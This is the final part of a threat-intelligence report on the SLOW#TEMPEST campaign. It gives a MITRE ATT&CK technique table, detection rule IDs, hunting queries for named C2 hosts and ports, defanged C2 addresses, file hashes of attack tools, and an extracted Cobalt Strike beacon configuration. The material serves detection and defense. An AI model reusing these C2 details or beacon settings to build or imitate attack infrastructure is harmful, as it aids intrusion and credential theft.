By leveraging these tools and strategies, security teams can enhance their ability to detect, respond to, and ultimately prevent advanced persistent threats like SLOW#TEMPEST. The insights gained from this campaign are invaluable, offering a blueprint for defending against some of the most sophisticated cyber threats in existence today.
Final Thoughts: Preparing for Future Threats
The SLOW#TEMPEST campaign highlights the importance of continuous vigilance and adaptation in cybersecurity. As threat actors continue to develop and refine their techniques, it is imperative that defenders do the same. The lessons learned from this campaign—ranging from the importance of robust endpoint logging to the need for constant monitoring of common attack vectors—should be integrated into the broader security strategies of organizations everywhere.
Ultimately, the discovery and analysis of the SLOW#TEMPEST campaign by the Securonix Threat Research team not only shed light on a specific threat but also provide a deeper understanding of the methods and motivations of modern cyber adversaries. By applying these insights, organizations can better protect themselves against the ever-present and ever-evolving threats in the cyber landscape.
APPENDIX – MITRE ATT&CK Matrix
Tactics | Techniques |
Initial Access | T1078.001: Valid Accounts: Default AccountsT1566.001: Phishing: Spearphishing Attachment |
Collection | T1560: Archive Collected Data |
Command and Control | T1132: Data Encoding |
Credential Access | T1003: OS Credential DumpingT1555: Credentials from Password Stores |
Defense Evasion | T1070.004: Indicator Removal: File DeletionT1562.001: Impair Defenses: Disable or Modify ToolsT1574.001: Hijack Execution Flow: DLL Search Order HijackingT1620: Reflective Code Loading |
Discovery | T1033: System Owner/User DiscoveryT1057: Process DiscoveryT1069: Permission Groups Discovery: Domain Groups T1082: System Information Discovery |
Execution | T1059.001: Command and Scripting Interpreter: PowerShellT1059.003: Command and Scripting Interpreter: Windows Command ShellT1059.006: Command and Scripting Interpreter: PythonT1569.002: System Services: Service ExecutionT1204.001: User Execution: Malicious LinkT1204.002: User Execution: Malicious File |
Lateral Movement | T1021.001: Remote Services: Remote Desktop ProtocolT1550.002: Use Alternate Authentication Material: Pass the Hash |
Persistence | T1053: Scheduled Task/Job |
Exfiltration | T1041: Exfiltration Over C2 Channel |
Relevant Securonix detections
- EDR-ALL-923-RU
- EDR-ALL-950-RU
- EDR-ALL-984-RU
- EDR-ALL-975-RU
- EDR-ALL-1023-RU
- EDR-ALL-1057-RU
- EDR-ALL-1294-RU
- EDR-ALL-1301-RU
- EDR-ALL-1306-RU
Relevant hunting queries
(remove square brackets “[ ]” for IP addresses or URLs)
- index = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “123.207.74[.]22” OR destinationaddress = “123.56.168[.]30” OR destinationaddress = “49.235.152[.]72”)
- index = activity AND rg_functionality = “Next Generation Firewall” AND (destinationhostname CONTAINS “myip.ipip[.]net” OR destinationhostname CONTAINS “360-1305242994.cos.ap-nanjing.myqcloud[.]com” )
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network connection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND (destinationport=”11443″ OR destinationport=”8282″)
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “File created” OR deviceaction = “File created (rule: FileCreate)”) AND customstring49 STARTS WITH “C:\Windows\Temp\tmp”
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND customstring49 STARTS WITH “C:\Windows\Temp\tmp”
C2 and infrastructure
C2 Address |
123.207.74[.]22 |
123.56.168[.]30 |
49.235.152[.]72 |
myip.ipip[.]net |
360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif |
Analyzed files/hashes
File Name | SHA256 |
Archive.zip (renamed) | 8e77101d3f615a58b8d759e8b82ca3dffd4823b9f72dc5c6989bb4311bdffa8604bcf25d07e5cf060e742325d6123242f262888705acac649f8d5010a5eb6a87 c35ea8498ed7ae33513e26fac321fecf0fc9306dda8c783904968e3c51648c37 |
20240739人员名单信息.zip | 3a9b64a61f6373ee427f27726460e7047b21ddcfd1d0d45ee4145192327a0408 |
╠Õ╝ý▒¿©µ.lnk | 28030E8CF4C9C39665A0552E82DA86781B00F099E240DB83F1D1A3AE0E990AB6 |
违规远程控制软件人员名单.docx.lnk | 1BA77DD1F5BF31D45FDB160C52EBE5829EC373350CDE35818FB90D45352B3601 |
dui70.dll | 1189D34E983A6FC9D2DC37AD591287C9E3E4D4BA83F66C7EDE692C36274BA648 |
gogo_windows_amd64.exe | 706BD7E05F275814C3B86EEC1A87148662029D91D0CE9B80386AAFFE7AA3753B |
iox.exe | C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 |
LLD.exe | 0BD048E0BCE956EDFBCEE6EDF32B8B67E08275BD38125B40A98665FAB4926C9D |
netspy.exe | 97C5CD06B543B0BDB270666092348EFBA0A9670AF05B11F3B56BF4B418DEC43A |
PVEFindADUser.exe | 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C |
fpr.exe | 1F510DED0D181B4636E83C69B66C92465DC0E64F6DB946FA4C246E7741F66141 |
sharpdecryptpwd.exe | 9F650117288B26312E84F32E23783FE3C81FCBA771C8AE58119BE92344C006CC |
pvefindaduser.exe | 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C |
tmp.log | EFE53F18D282516149BC6FEAC44C17DDE9F0704D95598AECBA3E7D734727B07E |
sa64.gif | 33A910162EAFE750316ADFAD4AB0955BE24C1BA048C2EC236C95E4A795C42932 |
References
- QakBot Malware Bypass Windows Security Using Unpatched Vulnerability
https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature - HackTricks: Dll Hijacking
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking - Geacon Brings Cobalt Strike Capabilities to macOS Threat Actors
https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/
Appendix A: Cobalt Strike Configuration
{
“BeaconType”: [
“HTTP”
],
“Port”: 11443,
“SleepTime”: 10000,
“MaxGetSize”: 6148882,
“Jitter”: 37,
“C2Server”: “123.207.74[.]22,/mall_100_100.html”,
“HttpPostUri”: “/ajax/recharge/recharge.json”,
“Malleable_C2_Instructions”: [
“Remove 2085 bytes from the end”,
“Remove 2085 bytes from the beginning”,
“Remove 712 bytes from the beginning”,
“NetBIOS decode ‘a’”
],
“HttpGet_Verb”: “GET”,
“HttpPost_Verb”: “POST”,
“HttpPostChunk”: 0,
“Spawnto_x86”: “%windir%\\syswow64\\runonce.exe”,
“Spawnto_x64”: “%windir%\\sysnative\\runonce.exe”,
“CryptoScheme”: 0,
“Proxy_Behavior”: “Use IE settings”,
“Watermark”: 666666666,
“bStageCleanup”: “True”,
“bCFGCaution”: “True”,
“KillDate”: 0,
“bProcInject_StartRWX”: “False”,
“bProcInject_UseRWX”: “False”,
“bProcInject_MinAllocSize”: 18700,
“ProcInject_PrependAppend_x86”: [
“kJCQkA==”,
“kJCQkA==”
],
“ProcInject_PrependAppend_x64”: [
“kJCQkA==”,
“kJCQkA==”
],
“ProcInject_Execute”: [
“CreateThread”,
“SetThreadContext”,
“NtQueueApcThread-s”,
“RtlCreateUserThread”,
“kernel32.dll:LoadLibraryA”
],
“ProcInject_AllocationMethod”: “VirtualAllocEx”,
“bUsesCookies”: “True”,
“HostHeader”: “”
}
Related Resource
- https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/
- https://www.securonix.com/blog/securonix-threat-labs-monthly-intelligence-insights-june-2024/
- https://www.securonix.com/blog/research-update-threat-actors-behind-the-devpopper-campaign-have-retooled-and-are-continuing-to-target-software-developers-via-social-engineering/
- https://www.securonix.com/blog/threat-actors-are-exploiting-the-recent-crowdstrike-outage-in-an-effort-to-deploy-malware-and-to-stage-ecrime-operations/